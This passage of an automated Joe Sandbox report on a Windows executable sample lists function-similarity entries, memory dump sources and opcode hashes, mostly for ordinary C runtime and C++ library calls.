                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2471032920-0
                                                                                                                                                                        • Opcode ID: 80f8afb178707850a606b64a4a6648f5eb7cb32af5f9546180562182a1725c04
                                                                                                                                                                        • Instruction ID: 0f648fccee3d7a0dd0c5deb3d07568df07dbe44afef882737846eafd8cf0e998
                                                                                                                                                                        • Opcode Fuzzy Hash: 80f8afb178707850a606b64a4a6648f5eb7cb32af5f9546180562182a1725c04
                                                                                                                                                                        • Instruction Fuzzy Hash: 33E1F9A2F04A82A5FB00EB75D8413AE6762FB457A4FA05631DA6C17BD9DF38D8C0C750
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: freemalloc$memcpy
                                                                                                                                                                        • String ID: ?
                                                                                                                                                                        • API String ID: 3519880569-1684325040
                                                                                                                                                                        • Opcode ID: afa3aa3dba3c314bd04bc67ca81b87aa2305902709e09113c4d8cab768f10ae9
                                                                                                                                                                        • Instruction ID: 4613d274313c8636d297948a7506797bb92b52712b2d9fd7a4ae226bad54c985
                                                                                                                                                                        • Opcode Fuzzy Hash: afa3aa3dba3c314bd04bc67ca81b87aa2305902709e09113c4d8cab768f10ae9
                                                                                                                                                                        • Instruction Fuzzy Hash: FB71A132A05B81A6EB55DF14E940279B364FB88B44F989239CF8D43751DF38F995C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: fclose$fseek$freadfreeftellmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3246642831-0
                                                                                                                                                                        • Opcode ID: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
                                                                                                                                                                        • Instruction ID: f444b395a331d3e8d955805b9a122e87b6ff415bcc7f1fe87f8c845a5540fbc9
                                                                                                                                                                        • Opcode Fuzzy Hash: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
                                                                                                                                                                        • Instruction Fuzzy Hash: B0316425B0978291FE856B56ED4133AB2A1FF48F90FA82030CD4E46758DE3CEC85CB20
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
                                                                                                                                                                        • Instruction ID: 0ba2171583b547b71ccf3f29edd8b45a915f0521b348b0be7e3e9fe0469d46a4
                                                                                                                                                                        • Opcode Fuzzy Hash: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
                                                                                                                                                                        • Instruction Fuzzy Hash: 7F51283660AB81D6EB15AF11E84062AB3E6FF44F44FA84A35CE8D47714DF38E890C720
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: fgetc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2807381905-0
                                                                                                                                                                        • Opcode ID: b6fda17f9f22a2a71ce80222b3e9a6b080b9117e8914581f8c1998a0c95ca2d5
                                                                                                                                                                        • Instruction ID: 4fb59fc554134a3a25151c8df68aab0dc83181d76ccab8d6d815bfe558d3c578
                                                                                                                                                                        • Opcode Fuzzy Hash: b6fda17f9f22a2a71ce80222b3e9a6b080b9117e8914581f8c1998a0c95ca2d5
                                                                                                                                                                        • Instruction Fuzzy Hash: BE91D032B14A80E9EB009F76C8442AD77B6F788768FA40236DE5D57B94DF38D894C710
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memchr$freemallocmemcpy
                                                                                                                                                                        • String ID: Window$]
                                                                                                                                                                        • API String ID: 96147131-2892678728
                                                                                                                                                                        • Opcode ID: d3927a9c7e9e7f8f330873aed43e4cf022b3c903acfdf90a64c63799ab93ec1a
                                                                                                                                                                        • Instruction ID: 4cd2115a9fa3db871b73ac0b198eb001592e32675d8ccff4a5d8f97174b6cf52
                                                                                                                                                                        • Opcode Fuzzy Hash: d3927a9c7e9e7f8f330873aed43e4cf022b3c903acfdf90a64c63799ab93ec1a
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C5125A1B086C591EB21AB95FD1527BE792BB45F84FE84131DE4D0B7C8DE6CE842C720
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: 513591ccb8ea7f0dc84527b17920d2e3f1dcf4cd211d2874c8ff9808d040457b
                                                                                                                                                                        • Instruction ID: fd3db3e75e0d17981fe56dfcc164c11b5d3410a80d746b606ecc123e75825d20
                                                                                                                                                                        • Opcode Fuzzy Hash: 513591ccb8ea7f0dc84527b17920d2e3f1dcf4cd211d2874c8ff9808d040457b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4451B532B04BC1A1EB10AF25D9442AA6363FB55B88FA84632DF5C07791CF38E9D5D351
                                                                                                                                                                        APIs
                                                                                                                                                                        • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AA73
                                                                                                                                                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AAC6
                                                                                                                                                                        • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AAEF
                                                                                                                                                                        • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB16
                                                                                                                                                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB5C
                                                                                                                                                                        • ?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB63
                                                                                                                                                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF786614B65), ref: 00007FF78662AB70
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 729925803-0
                                                                                                                                                                        • Opcode ID: f562df51e2c10ca44dab1a5043dac6a7c392a16626acdc964eea678447abf8e1
                                                                                                                                                                        • Instruction ID: a53acbff08925ffc46e1678810b049017e01d91d6b5afb9c3e64b3118f361f11
                                                                                                                                                                        • Opcode Fuzzy Hash: f562df51e2c10ca44dab1a5043dac6a7c392a16626acdc964eea678447abf8e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6C516222709A8192EB209B19DA9023AE7A2FF45F91F65C531CE5E437A0CF7DD846CB11
                                                                                                                                                                        APIs
                                                                                                                                                                        • ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B11D
                                                                                                                                                                        • ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B137
                                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B169
                                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B194
                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00007FF78662B1AD
                                                                                                                                                                        • ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF786629E1A), ref: 00007FF78662B1CC
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662B1F7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 762505753-0
                                                                                                                                                                        • Opcode ID: c6e6ef72eb529d48c11664ff68e77adead01e74f8777e7b2b03cf17b034884ae
                                                                                                                                                                        • Instruction ID: 22cb7cd6a5fc19dc8168beb800cefdb59d565bfd818c2d6d4637b751419454db
                                                                                                                                                                        • Opcode Fuzzy Hash: c6e6ef72eb529d48c11664ff68e77adead01e74f8777e7b2b03cf17b034884ae
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F316535B08B8191EB14AF11ED4416BB762FB48B94F980631DA9D077A4CF3CD894CB11
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmemset$ControlDevice_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4066468686-0
                                                                                                                                                                        • Opcode ID: 72e1392b3be96d1fbdb399585bb3dfb98613b5871dbe88a5d879b683c89b0b6a
                                                                                                                                                                        • Instruction ID: 3c1665b97b44307f66610aa411dd42539ffec3d7b5ca6ee9c1ffa6b3b489991e
                                                                                                                                                                        • Opcode Fuzzy Hash: 72e1392b3be96d1fbdb399585bb3dfb98613b5871dbe88a5d879b683c89b0b6a
                                                                                                                                                                        • Instruction Fuzzy Hash: EA719222B096C195EB11EB15A9043ABF3A2FB84BA4F644735DAAD03BD4CF7CD841CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strstr
                                                                                                                                                                        • String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
                                                                                                                                                                        • API String ID: 1392478783-2972057365
                                                                                                                                                                        • Opcode ID: 31ea54d5e077d2ce4ed5a18cf93e03cf0a6d179f2c85c5c0adce628be06480ca
                                                                                                                                                                        • Instruction ID: 91031b42fb2914bf04a413e272d11258c1f1b88ff32ad082ede9287217a4b363
                                                                                                                                                                        • Opcode Fuzzy Hash: 31ea54d5e077d2ce4ed5a18cf93e03cf0a6d179f2c85c5c0adce628be06480ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 78510972A18686D6DB11EF51E84247AB761FF84B84FA58135DE9D07354CF3CE881CB20
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: 59ec51f713108a694fc918e1d86239938008307f5ef79c90ebe3a65af4c44cc8
                                                                                                                                                                        • Instruction ID: 60aa841b6459f5254e4d3dd02bcde5aa6adc56c8aee765825c94a87c858d7ac8
                                                                                                                                                                        • Opcode Fuzzy Hash: 59ec51f713108a694fc918e1d86239938008307f5ef79c90ebe3a65af4c44cc8
                                                                                                                                                                        • Instruction Fuzzy Hash: 2C41E262B08AC2A1EF10AB12E8043AAE353FB44BD8FA84631DE5D0B7C5DE3CD941C711
                                                                                                                                                                        APIs
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C02A
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C039
                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C06D
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C074
                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7866129C8), ref: 00007FF78662C083
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF78662C0AE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1775671525-0
                                                                                                                                                                        • Opcode ID: 43d5decee7440c29b4e702e697857633f3b0710484b5a3146c5a711bc1f325ae
                                                                                                                                                                        • Instruction ID: 284a531407eecf7f2aa06eac02b9a04a2cf6f85ed55495703858e3b3fa57b5a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 43d5decee7440c29b4e702e697857633f3b0710484b5a3146c5a711bc1f325ae
                                                                                                                                                                        • Instruction Fuzzy Hash: C041C2A1B097C2A0EF50AB12A8043AAE253FB44BD4FE40631DA5D077C5CE3DE881CB51
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3189120677-0
                                                                                                                                                                        • Opcode ID: 4c0059edc66f98f0feb7a93b03dbf6daf3c0ba0d6c1fe3638ff6ea485f6b361c
                                                                                                                                                                        • Instruction ID: 5a2c778de9f391d92e27b92d618c97b28b4c6dec0f2b7ed5ee36b45400d64d15
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c0059edc66f98f0feb7a93b03dbf6daf3c0ba0d6c1fe3638ff6ea485f6b361c
                                                                                                                                                                        • Instruction Fuzzy Hash: C341B561B09AC2A5EB10EB12A9043ABE353FB44BD8FA84631DE5D077D5DE7CE841C721
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF786612701), ref: 00007FF7866298BC
